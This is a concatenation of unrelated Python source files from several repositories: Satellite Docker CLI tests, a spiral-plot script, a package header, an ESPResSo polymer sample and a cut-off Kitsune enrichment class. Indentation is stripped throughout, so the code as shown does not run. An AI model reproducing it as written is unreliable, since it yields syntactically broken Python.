cvv = ContentView.version_info({'id': content_view['versions'][0]['id']})
assert len(cvv['lifecycle-environments']) == 1
lces = [
make_lifecycle_environment({'organization-id': module_org.id})
for _ in range(1, randint(3, 6))
]
for expected_lces, lce in enumerate(lces, start=2):
ContentView.version_promote({'id': cvv['id'], 'to-lifecycle-environment-id': lce['id']})
cvv = ContentView.version_info({'id': cvv['id']})
assert len(cvv['lifecycle-environments']) == expected_lces
@pytest.mark.tier2
def test_positive_promote_with_docker_repo_composite(
self, module_org, module_lce, content_view
):
"""Add Docker-type repository to composite content view and publish it.
Then promote it to the next available lifecycle-environment.
:id: fb7d132e-d7fa-4890-a0ec-746dd093513e
:expectedresults: Docker-type repository is promoted to content view
found in the specific lifecycle-environment.
:BZ: 1359665
"""
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
assert len(content_view['versions']) == 1
comp_content_view = make_content_view({'composite': True, 'organization-id': module_org.id})
ContentView.update(
{
'component-ids': content_view['versions'][0]['id'],
'id': comp_content_view['id'],
}
)
comp_content_view = ContentView.info({'id': comp_content_view['id']})
assert content_view['versions'][0]['id'] in [
component['id'] for component in comp_content_view['components']
]
ContentView.publish({'id': comp_content_view['id']})
comp_content_view = ContentView.info({'id': comp_content_view['id']})
cvv = ContentView.version_info({'id': comp_content_view['versions'][0]['id']})
assert len(cvv['lifecycle-environments']) == 1
ContentView.version_promote(
{
'id': comp_content_view['versions'][0]['id'],
'to-lifecycle-environment-id': module_lce.id,
}
)
cvv = ContentView.version_info({'id': comp_content_view['versions'][0]['id']})
assert len(cvv['lifecycle-environments']) == 2
@pytest.mark.tier2
@pytest.mark.upgrade
def test_positive_promote_multiple_with_docker_repo_composite(self, content_view, module_org):
"""Add Docker-type repository to composite content view and publish it.
Then promote it to the multiple available lifecycle-environments.
:id: 345288d6-581b-4c07-8062-e58cb6343f1b
:expectedresults: Docker-type repository is promoted to content view
found in the specific lifecycle-environments.
:BZ: 1359665
"""
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
assert len(content_view['versions']) == 1
comp_content_view = make_content_view({'composite': True, 'organization-id': module_org.id})
ContentView.update(
{
'component-ids': content_view['versions'][0]['id'],
'id': comp_content_view['id'],
}
)
comp_content_view = ContentView.info({'id': comp_content_view['id']})
assert content_view['versions'][0]['id'] in [
component['id'] for component in comp_content_view['components']
]
ContentView.publish({'id': comp_content_view['id']})
comp_content_view = ContentView.info({'id': comp_content_view['id']})
cvv = ContentView.version_info({'id': comp_content_view['versions'][0]['id']})
assert len(cvv['lifecycle-environments']) == 1
lces = [
make_lifecycle_environment({'organization-id': module_org.id})
for _ in range(1, randint(3, 6))
]
for expected_lces, lce in enumerate(lces, start=2):
ContentView.version_promote(
{
'id': cvv['id'],
'to-lifecycle-environment-id': lce['id'],
}
)
cvv = ContentView.version_info({'id': cvv['id']})
assert len(cvv['lifecycle-environments']) == expected_lces
@pytest.mark.tier2
@pytest.mark.upgrade
def test_positive_name_pattern_change(self, module_org):
"""Promote content view with Docker repository to lifecycle environment.
Change registry name pattern for that environment. Verify that repository
name on product changed according to new pattern.
:id: 63c99ae7-238b-40ed-8cc1-d847eb4e6d65
:expectedresults: Container repository name is changed
according to new pattern.
"""
lce = make_lifecycle_environment({'organization-id': module_org.id})
pattern_prefix = gen_string('alpha', 5)
docker_upstream_name = 'hello-world'
new_pattern = (
f'{pattern_prefix}-<%= content_view.label %>/<%= repository.docker_upstream_name %>'
)
repo = _repo(
make_product_wait({'organization-id': module_org.id})['id'],
name=gen_string('alpha', 5),
upstream_name=docker_upstream_name,
)
Repository.synchronize({'id': repo['id']})
content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
ContentView.version_promote(
{'id': content_view['versions'][0]['id'], 'to-lifecycle-environment-id': lce['id']}
)
LifecycleEnvironment.update(
{
'registry-name-pattern': new_pattern,
'id': lce['id'],
'organization-id': module_org.id,
}
)
lce = LifecycleEnvironment.info({'id': lce['id'], 'organization-id': module_org.id})
assert lce['registry-name-pattern'] == new_pattern
repo = Repository.list(
{'name': repo['name'], 'environment-id': lce['id'], 'organization-id': module_org.id}
)[0]
expected_name = f'{pattern_prefix}-{content_view["label"]}/{docker_upstream_name}'.lower()
assert Repository.info({'id': repo['id']})['container-repository-name'] == expected_name
@pytest.mark.tier2
def test_positive_product_name_change_after_promotion(self, module_org):
"""Promote content view with Docker repository to lifecycle environment.
Change product name. Verify that repository name on product changed
according to new pattern.
:id: 92279755-717c-415c-88b6-4cc1202072e2
:expectedresults: Container repository name is changed
according to new pattern.
"""
old_prod_name = gen_string('alpha', 5)
new_prod_name = gen_string('alpha', 5)
docker_upstream_name = 'hello-world'
new_pattern = '<%= content_view.label %>/<%= product.name %>'
lce = make_lifecycle_environment({'organization-id': module_org.id})
prod = make_product_wait({'organization-id': module_org.id, 'name': old_prod_name})
repo = _repo(prod['id'], name=gen_string('alpha', 5), upstream_name=docker_upstream_name)
Repository.synchronize({'id': repo['id']})
content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
LifecycleEnvironment.update(
{
'registry-name-pattern': new_pattern,
'id': lce['id'],
'organization-id': module_org.id,
}
)
lce = LifecycleEnvironment.info({'id': lce['id'], 'organization-id': module_org.id})
assert lce['registry-name-pattern'] == new_pattern
ContentView.version_promote(
{'id': content_view['versions'][0]['id'], 'to-lifecycle-environment-id': lce['id']}
)
Product.update({'name': new_prod_name, 'id': prod['id']})
repo = Repository.list(
{'name': repo['name'], 'environment-id': lce['id'], 'organization-id': module_org.id}
)[0]
expected_name = f'{content_view["label"]}/{old_prod_name}'.lower()
assert Repository.info({'id': repo['id']})['container-repository-name'] == expected_name
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
ContentView.version_promote(
{
'id': content_view['versions'][-1]['id'],
'to-lifecycle-environment-id': lce['id'],
}
)
repo = Repository.list(
{
'name': repo['name'],
'environment-id': lce['id'],
'organization-id': module_org.id,
}
)[0]
expected_name = f'{content_view["label"]}/{new_prod_name}'.lower()
assert Repository.info({'id': repo['id']})['container-repository-name'] == expected_name
@pytest.mark.tier2
def test_positive_repo_name_change_after_promotion(self, module_org):
"""Promote content view with Docker repository to lifecycle environment.
Change repository name. Verify that Docker repository name on product
changed according to new pattern.
:id: f094baab-e823-47e0-939d-bd0d88eb1538
:expectedresults: Container repository name is changed
according to new pattern.
"""
old_repo_name = gen_string('alpha', 5)
new_repo_name = gen_string('alpha', 5)
docker_upstream_name = 'hello-world'
new_pattern = '<%= content_view.label %>/<%= repository.name %>'
lce = make_lifecycle_environment({'organization-id': module_org.id})
prod = make_product_wait({'organization-id': module_org.id})
repo = _repo(prod['id'], name=old_repo_name, upstream_name=docker_upstream_name)
Repository.synchronize({'id': repo['id']})
content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
LifecycleEnvironment.update(
{
'registry-name-pattern': new_pattern,
'id': lce['id'],
'organization-id': module_org.id,
}
)
ContentView.version_promote(
{'id': content_view['versions'][0]['id'], 'to-lifecycle-environment-id': lce['id']}
)
Repository.update({'name': new_repo_name, 'id': repo['id'], 'product-id': prod['id']})
repo = Repository.list(
{
'name': new_repo_name,
'environment-id': lce['id'],
'organization-id': module_org.id,
}
)[0]
expected_name = f'{content_view["label"]}/{old_repo_name}'.lower()
assert Repository.info({'id': repo['id']})['container-repository-name'] == expected_name
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
ContentView.version_promote(
{
'id': content_view['versions'][-1]['id'],
'to-lifecycle-environment-id': lce['id'],
}
)
repo = Repository.list(
{
'name': new_repo_name,
'environment-id': lce['id'],
'organization-id': module_org.id,
}
)[0]
expected_name = f'{content_view["label"]}/{new_repo_name}'.lower()
assert Repository.info({'id': repo['id']})['container-repository-name'] == expected_name
@pytest.mark.tier2
def test_negative_set_non_unique_name_pattern_and_promote(self, module_org):
"""Set registry name pattern to one that does not guarantee uniqueness.
Try to promote content view with multiple Docker repositories to
lifecycle environment. Verify that content has not been promoted.
:id: eaf5e7ac-93c9-46c6-b538-4d6bd73ab9fc
:expectedresults: Content view is not promoted
"""
docker_upstream_names = ['hello-world', 'alpine']
new_pattern = '<%= organization.label %>'
lce = make_lifecycle_environment(
{'organization-id': module_org.id, 'registry-name-pattern': new_pattern}
)
prod = make_product_wait({'organization-id': module_org.id})
content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
for docker_name in docker_upstream_names:
repo = _repo(prod['id'], upstream_name=docker_name)
Repository.synchronize({'id': repo['id']})
ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
with pytest.raises(CLIReturnCodeError):
ContentView.version_promote(
{'id': content_view['versions'][0]['id'], 'to-lifecycle-environment-id': lce['id']}
)
@pytest.mark.tier2
def test_negative_promote_and_set_non_unique_name_pattern(self, module_org, module_product):
"""Promote content view with multiple Docker repositories to
lifecycle environment. Set registry name pattern to one that
does not guarantee uniqueness. Verify that pattern has not been
changed.
:id: 9f952224-084f-48d1-b2ea-85f3621becea
:expectedresults: Registry name pattern is not changed
"""
docker_upstream_names = ['hello-world', 'alpine']
new_pattern = '<%= organization.label %>'
content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
for docker_name in docker_upstream_names:
repo = _repo(module_product.id, upstream_name=docker_name)
Repository.synchronize({'id': repo['id']})
ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
lce = make_lifecycle_environment({'organization-id': module_org.id})
ContentView.version_promote(
{'id': content_view['versions'][0]['id'], 'to-lifecycle-environment-id': lce['id']}
)
with pytest.raises(CLIReturnCodeError):
LifecycleEnvironment.update(
{
'registry-name-pattern': new_pattern,
'id': lce['id'],
'organization-id': module_org.id,
}
)
class TestDockerActivationKey:
"""Tests specific to adding ``Docker`` repositories to Activation Keys.
:CaseComponent: ActivationKeys
:Assignee: chiggins
:CaseLevel: Integration
"""
@pytest.mark.tier2
def test_positive_add_docker_repo_cv(self, module_org, module_lce, content_view_promote):
"""Add Docker-type repository to a non-composite content view
and publish it. Then create an activation key and associate it with the
Docker content view.
:id: bb128642-d39f-45c2-aa69-a4776ea536a2
:expectedresults: Docker-based content view can be added to activation
key
"""
activation_key = make_activation_key(
{
'content-view-id': content_view_promote['content-view-id'],
'lifecycle-environment-id': module_lce.id,
'organization-id': module_org.id,
}
)
assert activation_key['content-view'] == content_view_promote['content-view-name']
@pytest.mark.tier2
def test_positive_remove_docker_repo_cv(self, module_org, module_lce, content_view_promote):
"""Add Docker-type repository to a non-composite content view
and publish it. Create an activation key and associate it with the
Docker content view. Then remove this content view from the activation
key.
:id: d696e5fe-1818-46ce-9499-924c96e1ef88
:expectedresults: Docker-based content view can be added and then
removed from the activation key.
"""
activation_key = make_activation_key(
{
'content-view-id': content_view_promote['content-view-id'],
'lifecycle-environment-id': module_lce.id,
'organization-id': module_org.id,
}
)
assert activation_key['content-view'] == content_view_promote['content-view-name']
# Create another content view replace with
another_cv = make_content_view({'composite': False, 'organization-id': module_org.id})
ContentView.publish({'id': another_cv['id']})
another_cv = ContentView.info({'id': another_cv['id']})
ContentView.version_promote(
{'id': another_cv['versions'][0]['id'], 'to-lifecycle-environment-id': module_lce.id}
)
ActivationKey.update(
{
'id': activation_key['id'],
'organization-id': module_org.id,
'content-view-id': another_cv['id'],
'lifecycle-environment-id': module_lce.id,
}
)
activation_key = ActivationKey.info({'id': activation_key['id']})
assert activation_key['content-view'] != content_view_promote['content-view-name']
@pytest.mark.tier2
def test_positive_add_docker_repo_ccv(self, module_org, module_lce, content_view_publish):
"""Add Docker-type repository to a non-composite content view
and publish it. Then add this content view to a composite content view
and publish it. Create an activation key and associate it with the
composite Docker content view.
:id: 1d9b82fd-8dab-4fd9-ad35-656d712d56a2
:expectedresults: Docker-based content view can be added to activation
key
:BZ: 1359665
"""
comp_content_view = make_content_view({'composite': True, 'organization-id': module_org.id})
ContentView.update(
{
'component-ids': content_view_publish['id'],
'id': comp_content_view['id'],
}
)
comp_content_view = ContentView.info({'id': comp_content_view['id']})
assert content_view_publish['id'] in [
component['id'] for component in comp_content_view['components']
]
ContentView.publish({'id': comp_content_view['id']})
comp_content_view = ContentView.info({'id': comp_content_view['id']})
comp_cvv = ContentView.version_info({'id': comp_content_view['versions'][0]['id']})
ContentView.version_promote(
{'id': comp_cvv['id'], 'to-lifecycle-environment-id': module_lce.id}
)
activation_key = make_activation_key(
{
'content-view-id': comp_content_view['id'],
'lifecycle-environment-id': module_lce.id,
'organization-id': module_org.id,
}
)
assert activation_key['content-view'] == comp_content_view['name']
@pytest.mark.tier2
def test_positive_remove_docker_repo_ccv(self, module_org, module_lce, content_view_publish):
"""Add Docker-type repository to a non-composite content view
and publish it. Then add this content view to a composite content view
and publish it. Create an activation key and associate it with the
composite Docker content view. Then, remove the composite content view
from the activation key.
:id: b4e63537-d3a8-4afa-8e18-57052b93fb4c
:expectedresults: Docker-based composite content view can be added and
then removed from the activation key.
:BZ: 1359665
"""
comp_content_view = make_content_view({'composite': True, 'organization-id': module_org.id})
ContentView.update(
{
'component-ids': content_view_publish['id'],
'id': comp_content_view['id'],
}
)
comp_content_view = ContentView.info({'id': comp_content_view['id']})
assert content_view_publish['id'] in [
component['id'] for component in comp_content_view['components']
]
ContentView.publish({'id': comp_content_view['id']})
comp_content_view = ContentView.info({'id': comp_content_view['id']})
comp_cvv = ContentView.version_info({'id': comp_content_view['versions'][0]['id']})
ContentView.version_promote(
{'id': comp_cvv['id'], 'to-lifecycle-environment-id': module_lce.id}
)
activation_key = make_activation_key(
{
'content-view-id': comp_content_view['id'],
'lifecycle-environment-id': module_lce.id,
'organization-id': module_org.id,
}
)
assert activation_key['content-view'] == comp_content_view['name']
# Create another content view replace with
another_cv = make_content_view({'composite': False, 'organization-id': module_org.id})
ContentView.publish({'id': another_cv['id']})
another_cv = ContentView.info({'id': another_cv['id']})
ContentView.version_promote(
{'id': another_cv['versions'][0]['id'], 'to-lifecycle-environment-id': module_lce.id}
)
ActivationKey.update(
{
'id': activation_key['id'],
'organization-id': module_org.id,
'content-view-id': another_cv['id'],
'lifecycle-environment-id': module_lce.id,
}
)
activation_key = ActivationKey.info({'id': activation_key['id']})
assert activation_key['content-view'] != comp_content_view['name']
class TestDockerClient:
"""Tests specific to using ``Docker`` as a client to pull Docker images
from a Satellite 6 instance.
:CaseComponent: ContentManagement
:Assignee: ltran
:CaseLevel: System
:CaseImportance: Medium
"""
@pytest.mark.tier3
def test_positive_pull_image(self, module_org, docker_host):
"""A Docker-enabled client can use ``docker pull`` to pull a
Docker image off a Satellite 6 instance.
:id: 023f0538-2aad-4f87-b8a8-6ccced648366
:Steps:
1. Publish and promote content view with Docker content
2. Register Docker-enabled client against Satellite 6.
:expectedresults: Client can pull Docker images from server and run it.
"""
product = make_product_wait({'organization-id': module_org.id})
repo = _repo(product['id'])
Repository.synchronize({'id': repo['id']})
repo = Repository.info({'id': repo['id']})
try:
result = docker_host.execute(
f'docker login -u {settings.server.admin_username}'
f' -p {settings.server.admin_password} {settings.server.hostname}'
)
assert result.status == 0
# publishing takes few seconds sometimes
result, _ = wait_for(
lambda: docker_host.execute(f'docker pull {repo["published-at"]}'),
num_sec=60,
delay=2,
fail_condition=lambda out: out.status != 0,
logger=logger,
)
assert result.status == 0
try:
result = docker_host.execute(f'docker run {repo["published-at"]}')
assert result.status == 0
finally:
# Stop and remove the container
result = docker_host.execute(f'docker ps -a | grep {repo["published-at"]}')
container_id = result.stdout[0].split()[0]
docker_host.execute(f'docker stop {container_id}')
docker_host.execute(f'docker rm {container_id}')
finally:
# Remove docker image
docker_host.execute(f'docker rmi {repo["published-at"]}')
@pytest.mark.skip_if_not_set('docker')
@pytest.mark.tier3
def test_positive_container_admin_end_to_end_search(self, module_org, docker_host):
"""Verify that docker command line can be used against
Satellite server to search for container images stored
on Satellite instance.
:id: cefa74e1-e40d-4f47-853b-1268643cea2f
:steps:
1. Publish and promote content view with Docker content
2. Set 'Unauthenticated Pull' option to false
3. Try to search for docker images on Satellite
4. Use Docker client to login to Satellite docker hub
5. Search for docker images
6. Use Docker client to log out of Satellite docker hub
7. Try to search for docker images (ensure last search result
is caused by change of Satellite option and not login/logout)
8. Set 'Unauthenticated Pull' option to true
9. Search for docker images
:expectedresults: Client can search for docker images stored
on Satellite instance
"""
pattern_prefix = gen_string('alpha', 5)
registry_name_pattern = (
f'{pattern_prefix}-<%= content_view.label %>/<%= repository.docker_upstream_name %>'
)
# Satellite setup: create product and add Docker repository;
# create content view and add Docker repository;
# create lifecycle environment and promote content view to it
lce = make_lifecycle_environment({'organization-id': module_org.id})
product = make_product_wait({'organization-id': module_org.id})
repo = _repo(product['id'], upstream_name=CONTAINER_UPSTREAM_NAME)
Repository.synchronize({'id': repo['id']})
content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
ContentView.version_promote(
{'id': content_view['versions'][0]['id'], 'to-lifecycle-environment-id': lce['id']}
)
LifecycleEnvironment.update(
{
'registry-name-pattern': registry_name_pattern,
'registry-unauthenticated-pull': 'false',
'id': lce['id'],
'organization-id': module_org.id,
}
)
docker_repo_uri = (
f' {settings.server.hostname}/{pattern_prefix}-{content_view["label"]}/'
f'{CONTAINER_UPSTREAM_NAME} '
).lower()
# 3. Try to search for docker images on Satellite
remote_search_command = (
f'docker search {settings.server.hostname}/{CONTAINER_UPSTREAM_NAME}'
)
result = docker_host.execute(remote_search_command)
assert result.status == 0
assert docker_repo_uri not in result.stdout
# 4. Use Docker client to login to Satellite docker hub
result = docker_host.execute(
f'docker login -u {settings.server.admin_username}'
f' -p {settings.server.admin_password} {settings.server.hostname}'
)
assert result.status == 0
# 5. Search for docker images
result = docker_host.execute(remote_search_command)
assert result.status == 0
assert docker_repo_uri in result.stdout
# 6. Use Docker client to log out of Satellite docker hub
result = docker_host.execute(f'docker logout {settings.server.hostname}')
assert result.status == 0
# 7. Try to search for docker images
result = docker_host.execute(remote_search_command)
assert result.status == 0
assert docker_repo_uri not in result.stdout
# 8. Set 'Unauthenticated Pull' option to true
LifecycleEnvironment.update(
{
'registry-unauthenticated-pull': 'true',
'id': lce['id'],
'organization-id': module_org.id,
}
)
# 9. Search for docker images
result = docker_host.execute(remote_search_command)
assert result.status == 0
assert docker_repo_uri in result.stdout
@pytest.mark.skip_if_not_set('docker')
@pytest.mark.tier3
def test_positive_container_admin_end_to_end_pull(self, module_org, docker_host):
"""Verify that docker command line can be used against
Satellite server to pull in container images stored
on Satellite instance.
:id: 2a331f88-406b-4a5c-ae70-302a9994077f
:steps:
1. Publish and promote content view with Docker content
2. Set 'Unauthenticated Pull' option to false
3. Try to pull in docker image from Satellite
4. Use Docker client to login to Satellite container registry
5. Pull in docker image
6. Use Docker client to log out of Satellite container registry
7. Try to pull in docker image (ensure next pull result
is caused by change of Satellite option and not login/logout)
8. Set 'Unauthenticated Pull' option to true
9. Pull in docker image
:expectedresults: Client can pull in docker images stored
on Satellite instance
"""
pattern_prefix = gen_string('alpha', 5)
docker_upstream_name = CONTAINER_UPSTREAM_NAME
registry_name_pattern = (
f'{pattern_prefix}-<%= content_view.label %>/<%= repository.docker_upstream_name %>'
)
# Satellite setup: create product and add Docker repository;
# create content view and add Docker repository;
# create lifecycle environment and promote content view to it
lce = make_lifecycle_environment({'organization-id': module_org.id})
product = make_product_wait({'organization-id': module_org.id})
repo = _repo(product['id'], upstream_name=docker_upstream_name)
Repository.synchronize({'id': repo['id']})
content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
ContentView.version_promote(
{'id': content_view['versions'][0]['id'], 'to-lifecycle-environment-id': lce['id']}
)
LifecycleEnvironment.update(
{
'registry-name-pattern': registry_name_pattern,
'registry-unauthenticated-pull': 'false',
'id': lce['id'],
'organization-id': module_org.id,
}
)
docker_repo_uri = (
f'{settings.server.hostname}/{pattern_prefix}-{content_view["label"]}/'
f'{docker_upstream_name}'
).lower()
# 3. Try to pull in docker image from Satellite
docker_pull_command = f'docker pull {docker_repo_uri}'
result = docker_host.execute(docker_pull_command)
assert result.status == 1
# 4. Use Docker client to login to Satellite docker hub
result = docker_host.execute(
f'docker login -u {settings.server.admin_username}'
f' -p {settings.server.admin_password} {settings.server.hostname}'
)
assert result.status == 0
# 5. Pull in docker image
# publishing takes few seconds sometimes
result, _ = wait_for(
lambda: docker_host.execute(docker_pull_command),
num_sec=60,
delay=2,
fail_condition=lambda out: out.status != 0,
logger=logger,
)
assert result.status == 0
# 6. Use Docker client to log out of Satellite docker hub
result = docker_host.execute(f'docker logout {settings.server.hostname}')
assert result.status == 0
# 7. Try to pull in docker image
result = docker_host.execute(docker_pull_command)
assert result.status == 1
# 8. Set 'Unauthenticated Pull' option to true
LifecycleEnvironment.update(
{
'registry-unauthenticated-pull': 'true',
'id': lce['id'],
'organization-id': module_org.id,
}
)
# 9. Pull in docker image
result = docker_host.execute(docker_pull_command)
assert result.status == 0
@pytest.mark.stubbed
@pytest.mark.skip_if_not_set('docker')
@pytest.mark.tier3
@pytest.mark.upgrade
def test_positive_upload_image(self, module_org):
"""A Docker-enabled client can create a new ``Dockerfile``
pointing to an existing Docker image from a Satellite 6 and modify it.
Then, using ``docker build`` generate a new image which can then be
uploaded back onto the Satellite 6 as a new repository.
:id: 2c47559c-b27f-436e-9b1e-df5c3633b007
:Steps:
1. Create a local docker compute resource
2. Create a container and start it
3. [on docker host] Commit a new image from the container
4. [on docker host] Export the image to tar
5. scp the image to satellite box
6. create a new docker repo
7. upload the image to the new repo
:expectedresults: Client can create a new image based off an existing
Docker image from a Satellite 6 instance, add a new package and
upload the modified image (plus layer) back to the Satellite 6.
"""
try:
"""
These functions were removed, but let's leave them here
to maintain overall test logic - in case required functionality
is eventually implemented
compute_resource = make_compute_resource({
'organization-ids': [module_org.id],
'provider': 'Docker',
'url': f'http://{docker_host.ip_addr}:2375',
})
container = make_container({
'compute-resource-id': compute_resource['id'],
'organization-ids': [module_org.id],
})
Docker.container.start({'id': container['id']})
"""
container = {'uuid': 'stubbed test'}
repo_name = gen_string('alphanumeric').lower()
# Commit a new docker image and verify image was created
image_name = f'{repo_name}/{CONTAINER_UPSTREAM_NAME}'
result = docker_host.execute(
f'docker commit {container["uuid"]} {image_name}:latest && '
f'docker images --all | grep {image_name}'
)
assert result.status == 0
# Save the image to a tar archive
result = docker_host.execute(f'docker save -o {repo_name}.tar {image_name}')
assert result.status == 0
tar_file = f'{repo_name}.tar'
ssh.download_file(tar_file, hostname=docker_host.ip_addr)
ssh.upload_file(
local_file=tar_file,
remote_file=f'/tmp/{tar_file}',
hostname=settings.server.hostname,
)
# Upload tarred repository
product = make_product_wait({'organization-id': module_org.id})
repo = _repo(product['id'])
Repository.upload_content({'id': repo['id'], 'path': f'/tmp/{repo_name}.tar'})
# Verify repository was uploaded successfully
repo = Repository.info({'id': repo['id']})
assert settings.server.hostname == repo['published-at']
repo_name = '-'.join((module_org.label, product['label'], repo['label'])).lower()
assert repo_name in repo['published-at']
finally:
# Remove the archive
ssh.command(f'rm -f /tmp/{repo_name}.tar')
|
exmachina-dev/WDY-firmware
|
tools/graph_spiral.py
|
"""
ldr.py
Display analog data from Arduino using Python (matplotlib)
Author: Mahesh Venkitachalam
Website: electronut.in
"""
import argparse
import numpy as np
import math
import matplotlib.pyplot as plt
import matplotlib.animation as animation
_S_THK = 1.1
_D_DIA = 120
WDY_MAX_POSITION = 30000
WDY_STRAP_DEAD_OFFSET = 0
WDY_DRUM_OFFSET_TURNS = 0
_PI = 3.1415
def spiral_length_to_turns(length):
Nturns = (_S_THK - _D_DIA + math.sqrt(
pow(_D_DIA - _S_THK, 2) + ((4 * _S_THK * (
(WDY_MAX_POSITION - length + WDY_STRAP_DEAD_OFFSET))) / _PI))) / \
(2 * _S_THK)
return Nturns
def spiral_length_to_diameter(length):
Ddiameter = 2 * (spiral_length_to_turns(length) + WDY_DRUM_OFFSET_TURNS) \
* _S_THK + _D_DIA
return Ddiameter
# main() function
def main():
# create parser
parser = argparse.ArgumentParser(description="Graph from serial data")
parser.add_argument('--max', '-M', type=int, default=30000)
parser.add_argument('--min', '-m', type=int, default=0)
parser.add_argument('--step', '-s', type=int, default=1)
# parse args
args = parser.parse_args()
# plot parameters
data1 = []
data2 = []
for i in range(args.min, args.max, args.step):
data1.append(spiral_length_to_turns(i))
data2.append(spiral_length_to_diameter(i))
print('Plotting data...')
# set up animation
ax = plt.axes(xlim=(0, args.max), ylim=(0, data2[0] + 10))
ax.plot(data1, label='Length to turns')
ax.plot(data2, label='Length to diameter')
# show plot
ax.legend()
plt.show()
print('Exiting.')
# call main
if __name__ == '__main__':
main()
|
FabriceSalvaire/PyValentina
|
Patro/__init__.py
|
####################################################################################################
#
# Patro - A Python library to make patterns for fashion design
# Copyright (C) 2017 Fabrice Salvaire
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
####################################################################################################
# cf. PEP 396 -- Module Version Numbers https://www.python.org/dev/peps/pep-0396/
__version__ = '0.3.0'
|
tbereau/espresso
|
samples/python/minimal-polymer.py
|
#
# Copyright (C) 2013,2014,2015,2016 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import espressomd
from espressomd import thermostat
from espressomd import integrate
from espressomd import interactions
import numpy
# System parameters
#############################################################
system = espressomd.System()
#if no seed is provided espresso generates a seed
system.time_step = 0.01
system.skin = 0.4
system.box_l = [100, 100, 100]
system.thermostat.set_langevin(1.0, 1.0)
system.cell_system.set_n_square(use_verlet_lists=False)
system.non_bonded_inter[0, 0].lennard_jones.set_params(
epsilon=1, sigma=1,
cutoff=2**(1. / 6), shift="auto")
fene = interactions.FeneBond(k=10, d_r_max=2)
system.bonded_inter.add(fene)
poly = system.polymer
poly(N_P = 1, bond_length = 1.0, MPC=50, bond_id=0)
#############################################################
# Integration #
#############################################################
for i in range(20):
integrate.integrate(1000)
energies = system.analysis.energy()
print energies
|
sanacl/GrimoireELK
|
grimoire/elk/kitsune.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#
#
# Copyright (C) Bitergia
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# Authors:
# Alvaro del Castillo San Felix <acs@bitergia.com>
#
import json
import logging
from dateutil import parser
from grimoire.elk.enrich import Enrich, metadata
from .utils import get_time_diff_days
class KitsuneEnrich(Enrich):
def get_field_author(self):
return "creator"
def get_elastic_mappings(self):
mapping = """
{
"properties": {
"content_analyzed": {
"type": "string",
"index":"analyzed"
},
"tags_analyzed": {
"type": "string",
"index":"analyzed"
}
}
} """
return {"items":mapping}
def get_sh_identity(self, item, identity_field=None):
identity = {}
user = item
if 'data' in item and type(item) == dict:
user = item['data'][identity_field]
elif identity_field in item:
# for answers
user = item[identity_field]
identity['username'] = user['username']
identity['email'] = None
identity['name'] = user['username']
if user['display_name']:
identity['name'] = user['display_name']
return identity
def get_identities(self, item):
""" Return the identities from an item """
identities = []
item = item['data']
for identity in ['creator']:
# Todo: questions has also involved and solved_by
if identity in item and item[identity]:
user = self.get_sh_identity(item[identity])
identities.append(user)
if 'answers_data' in item:
for answer in item['answers_data']:
user = self.get_sh_identity(answer[identity])
identities.append(user)
return identities
@metadata
def get_rich_item(self, item, kind='question'):
eitem = {}
# Fields common in questions and answers
common_fields = ["product", "topic", "locale", "is_spam", "title"]
if kind == 'question':
eitem['type'] = kind
# metadata fields to copy
copy_fields = ["metadata__updated_on","metadata__timestamp","ocean-unique-id","origin","offset"]
for f in copy_fields:
if f in item:
eitem[f] = item[f]
else:
eitem[f] = None
# The real data
question = item['data']
# data fields to copy
copy_fields = ["content", "num_answers", "solution"]
